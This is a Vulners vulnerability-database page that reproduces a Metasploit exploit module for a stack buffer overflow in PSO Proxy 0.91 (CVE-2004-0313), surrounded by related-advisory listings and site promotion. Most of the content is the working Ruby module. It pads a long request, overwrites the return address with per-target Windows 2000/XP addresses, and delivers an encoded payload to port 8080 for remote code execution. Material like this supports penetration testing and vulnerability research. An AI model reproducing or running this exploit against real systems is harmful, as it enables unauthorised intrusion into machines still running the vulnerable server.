Lucene search
+L

PSOProxy 0.91 - Stack Buffer Overflow (Metasploit)

🗓️ 09 May 2010 00:00:00Reported by MetasploitType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 32 Views

PSOProxy 0.91 Stack Buffer Overflow in Web Serve

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2004-0313
9 May 201000:00
circl
cve
CVE
CVE-2004-0313
18 Mar 200405:00
cve
cvelist
Cvelist
CVE-2004-0313
18 Mar 200405:00
cvelist
exploitdb
Exploit DB
PSOProxy 0.91 (Windows 2000/XP) - Remote Buffer Overflow
26 Feb 200400:00
exploitdb
exploitdb
Exploit DB
PSOProxy 0.91 - Remote Buffer Overflow (1)
20 Feb 200400:00
exploitdb
exploitdb
Exploit DB
PSOProxy 0.91 - Remote Buffer Overflow (2)
20 Feb 200400:00
exploitdb
exploitdb
Exploit DB
PSOProxy 0.91 - Remote Buffer Overflow (3)
20 Feb 200400:00
exploitdb
metasploit
Metasploit
PSO Proxy v0.91 Stack Buffer Overflow
9 Sep 200722:37
metasploit
nvd
NVD
CVE-2004-0313
23 Nov 200405:00
nvd
packetstorm
Packet Storm
PSO Proxy v0.91 Stack Overflow
26 Nov 200900:00
packetstorm
Rows per page
##
# $Id: psoproxy91_overflow.rb 9262 2010-05-09 17:45:00Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##



class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'PSO Proxy v0.91 Stack Buffer Overflow',
			'Description'    => %q{
				This module exploits a buffer overflow in the PSO Proxy v0.91 web server.
				If a client sends an excessively long string the stack is overwritten.
			},
			'Author'         => 'Patrick Webster <[email protected]>',
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9262 $',
			'References'     =>
				[
					[ 'CVE', '2004-0313' ],
					[ 'OSVDB', '4028' ],
					[ 'URL', 'http://www.milw0rm.com/exploits/156' ],
					[ 'BID', '9706' ],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Payload'        =>
				{
					'Space'    => 370,
					'BadChars' => "\x00\x0a\x0d\x20",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
				# Patrick - Tested OK 2007/09/06 against w2ksp0, w2ksp4, xpsp0,xpsp2 en.
					[ 'Windows 2000 Pro SP0-4 English',  { 'Ret' => 0x75023112 } ], # call ecx ws2help.dll
					[ 'Windows 2000 Pro SP0-4 French',   { 'Ret' => 0x74fa3112 } ], # call ecx ws2help.dll
					[ 'Windows 2000 Pro SP0-4 Italian',  { 'Ret' => 0x74fd3112 } ], # call ecx ws2help.dll
					[ 'Windows XP Pro SP0/1 English',    { 'Ret' => 0x71aa396d } ], # call ecx ws2help.dll
					[ 'Windows XP Pro SP2 English',	     { 'Ret' => 0x71aa3de3 } ], # call ecx ws2help.dll
				],
			'Privileged'     => false,
			'DisclosureDate' => 'Feb 20 2004'
			))

		register_options(
			[
				Opt::RPORT(8080),
			], self.class)
	end

	def check
		connect
		sock.put("GET / HTTP/1.0\r\n\r\n")
		banner = sock.get(-1,3)
		if (banner =~ /PSO Proxy 0\.9/)
			return Exploit::CheckCode::Vulnerable
		end
		return Exploit::CheckCode::Safe
	end

	def exploit
		connect

		exploit = rand_text_alphanumeric(1024, payload_badchars)
		exploit += [target['Ret']].pack('V') + payload.encoded

		sock.put(exploit + "\r\n\r\n")

		disconnect
		handler
	end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

27 Oct 2016 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 210
EPSS0.63605
32